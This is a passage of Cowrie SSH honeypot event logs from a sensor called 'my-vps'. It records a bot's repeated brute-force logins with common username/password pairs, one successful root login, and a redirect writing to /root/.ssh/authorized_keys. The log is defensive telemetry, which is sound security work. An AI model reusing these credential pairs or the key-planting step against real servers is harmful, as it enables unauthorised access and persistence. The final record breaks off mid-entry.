{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-08T12:35:14.193042Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:35:14.193889Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48730,"dst_ip":"1.2.3.4","dst_port":22,"session":"20d9b1006839","protocol":"ssh","message":"New connection: 212.227.235.229:48730 (1.2.3.4:22) [session: 20d9b1006839]","sensor":"my-vps","timestamp":"2025-09-08T12:35:14.374896Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:35:14.376101Z","src_ip":"212.227.235.229","session":"20d9b1006839"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:35:14.559682Z","src_ip":"212.227.235.229","session":"20d9b1006839"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-08T12:35:15.337340Z","src_ip":"212.227.235.229","session":"20d9b1006839"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:35:16.523467Z","src_ip":"212.227.235.229","session":"20d9b1006839"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48742,"dst_ip":"1.2.3.4","dst_port":22,"session":"295095634758","protocol":"ssh","message":"New connection: 212.227.235.229:48742 (1.2.3.4:22) [session: 295095634758]","sensor":"my-vps","timestamp":"2025-09-08T12:35:16.704480Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:35:16.705187Z","src_ip":"212.227.235.229","session":"295095634758"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:35:16.886546Z","src_ip":"212.227.235.229","session":"295095634758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60175,"dst_ip":"1.2.3.4","dst_port":22,"session":"096714a82459","protocol":"ssh","message":"New connection: 212.227.235.229:60175 (1.2.3.4:22) [session: 096714a82459]","sensor":"my-vps","timestamp":"2025-09-08T12:35:17.445773Z"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-08T12:35:17.651608Z","src_ip":"212.227.235.229","session":"295095634758"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:35:17.695623Z","src_ip":"212.227.235.229","session":"096714a82459"}
{"eventid":"cowrie.session.closed","duration":"5.8","message":"Connection lost after 5.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:35:17.835224Z","src_ip":"212.227.235.229","session":"d9fd033ca48f"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:35:17.836766Z","src_ip":"212.227.235.229","session":"295095634758"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40218,"dst_ip":"1.2.3.4","dst_port":22,"session":"b8cb30d9f0e0","protocol":"ssh","message":"New connection: 212.227.125.160:40218 (1.2.3.4:22) [session: b8cb30d9f0e0]","sensor":"my-vps","timestamp":"2025-09-08T12:35:18.138059Z"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:35:18.737083Z","src_ip":"212.227.125.160","session":"b8cb30d9f0e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49726,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ae22e153e4b","protocol":"ssh","message":"New connection: 212.227.235.229:49726 (1.2.3.4:22) [session: 0ae22e153e4b]","sensor":"my-vps","timestamp":"2025-09-08T12:35:41.926702Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:35:41.928520Z","src_ip":"212.227.235.229","session":"0ae22e153e4b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:35:42.226506Z","src_ip":"212.227.235.229","session":"0ae22e153e4b"}
{"eventid":"cowrie.login.failed","username":"centos","password":"2025","message":"login attempt [centos/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:35:43.419914Z","src_ip":"212.227.235.229","session":"0ae22e153e4b"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:35:44.724940Z","src_ip":"212.227.235.229","session":"0ae22e153e4b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37184,"dst_ip":"1.2.3.4","dst_port":22,"session":"54078a64a58e","protocol":"ssh","message":"New connection: 212.227.235.229:37184 (1.2.3.4:22) [session: 54078a64a58e]","sensor":"my-vps","timestamp":"2025-09-08T12:36:17.017099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:36:17.026528Z","src_ip":"212.227.235.229","session":"54078a64a58e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:36:17.192940Z","src_ip":"212.227.235.229","session":"54078a64a58e"}
{"eventid":"cowrie.login.failed","username":"boris","password":"boris.123","message":"login attempt [boris/boris.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:36:17.855504Z","src_ip":"212.227.235.229","session":"54078a64a58e"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:36:19.031723Z","src_ip":"212.227.235.229","session":"54078a64a58e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43536,"dst_ip":"1.2.3.4","dst_port":22,"session":"f26b38a752b2","protocol":"ssh","message":"New connection: 212.227.235.229:43536 (1.2.3.4:22) [session: f26b38a752b2]","sensor":"my-vps","timestamp":"2025-09-08T12:36:26.827157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:36:26.828202Z","src_ip":"212.227.235.229","session":"f26b38a752b2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:36:26.953280Z","src_ip":"212.227.235.229","session":"f26b38a752b2"}
{"eventid":"cowrie.login.failed","username":"centos","password":"2025","message":"login attempt [centos/2025] failed","sensor":"my-vps","timestamp":"2025-09-08T12:36:27.495388Z","src_ip":"212.227.235.229","session":"f26b38a752b2"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:36:28.623058Z","src_ip":"212.227.235.229","session":"f26b38a752b2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41406,"dst_ip":"1.2.3.4","dst_port":22,"session":"c39d3451d181","protocol":"ssh","message":"New connection: 212.227.235.229:41406 (1.2.3.4:22) [session: c39d3451d181]","sensor":"my-vps","timestamp":"2025-09-08T12:36:36.692952Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:36:36.694123Z","src_ip":"212.227.235.229","session":"c39d3451d181"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:36:36.991609Z","src_ip":"212.227.235.229","session":"c39d3451d181"}
{"eventid":"cowrie.login.failed","username":"init","password":"init.123","message":"login attempt [init/init.123] failed","sensor":"my-vps","timestamp":"2025-09-08T12:36:38.219416Z","src_ip":"212.227.235.229","session":"c39d3451d181"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:36:39.517784Z","src_ip":"212.227.235.229","session":"c39d3451d181"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43426,"dst_ip":"1.2.3.4","dst_port":22,"session":"1cb8a83f4422","protocol":"ssh","message":"New connection: 212.227.235.229:43426 (1.2.3.4:22) [session: 1cb8a83f4422]","sensor":"my-vps","timestamp":"2025-09-08T12:36:53.673202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:36:53.673977Z","src_ip":"212.227.235.229","session":"1cb8a83f4422"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:36:53.946020Z","src_ip":"212.227.235.229","session":"1cb8a83f4422"}
{"eventid":"cowrie.login.failed","username":"super","password":"1234567890","message":"login attempt [super/1234567890] failed","sensor":"my-vps","timestamp":"2025-09-08T12:36:55.028567Z","src_ip":"212.227.235.229","session":"1cb8a83f4422"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:36:56.303013Z","src_ip":"212.227.235.229","session":"1cb8a83f4422"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33102,"dst_ip":"1.2.3.4","dst_port":22,"session":"d2dec8059e74","protocol":"ssh","message":"New connection: 212.227.235.229:33102 (1.2.3.4:22) [session: d2dec8059e74]","sensor":"my-vps","timestamp":"2025-09-08T12:37:31.745688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:37:31.746439Z","src_ip":"212.227.235.229","session":"d2dec8059e74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:37:32.035911Z","src_ip":"212.227.235.229","session":"d2dec8059e74"}
{"eventid":"cowrie.login.failed","username":"appuser","password":"password1","message":"login attempt [appuser/password1] failed","sensor":"my-vps","timestamp":"2025-09-08T12:37:33.235700Z","src_ip":"212.227.235.229","session":"d2dec8059e74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41308,"dst_ip":"1.2.3.4","dst_port":22,"session":"5998bb438009","protocol":"ssh","message":"New connection: 212.227.235.229:41308 (1.2.3.4:22) [session: 5998bb438009]","sensor":"my-vps","timestamp":"2025-09-08T12:37:33.650068Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:37:33.651067Z","src_ip":"212.227.235.229","session":"5998bb438009"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-08T12:37:33.777696Z","src_ip":"212.227.235.229","session":"5998bb438009"}
{"eventid":"cowrie.login.failed","username":"mos","password":"123456789","message":"login attempt [mos/123456789] failed","sensor":"my-vps","timestamp":"2025-09-08T12:37:34.325323Z","src_ip":"212.227.235.229","session":"5998bb438009"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:37:34.528089Z","src_ip":"212.227.235.229","session":"d2dec8059e74"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-09-08T12:37:35.454496Z","src_ip":"212.227.235.229","session":"5998bb438009"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37310,"dst_ip":"1.2.3.4","dst_port":22,"session":"77af024c70ac","protocol":"ssh","message":"New connection: 212.227.235.229:37310 (1.2.3.4:22) [session: 77af024c70ac]","sensor":"my-vps","timestamp":"2025-09-08T12:37:41.048176Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-08T12:37:41.054774Z","src_ip":"212.227.235.229","session":"77af024c70ac"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],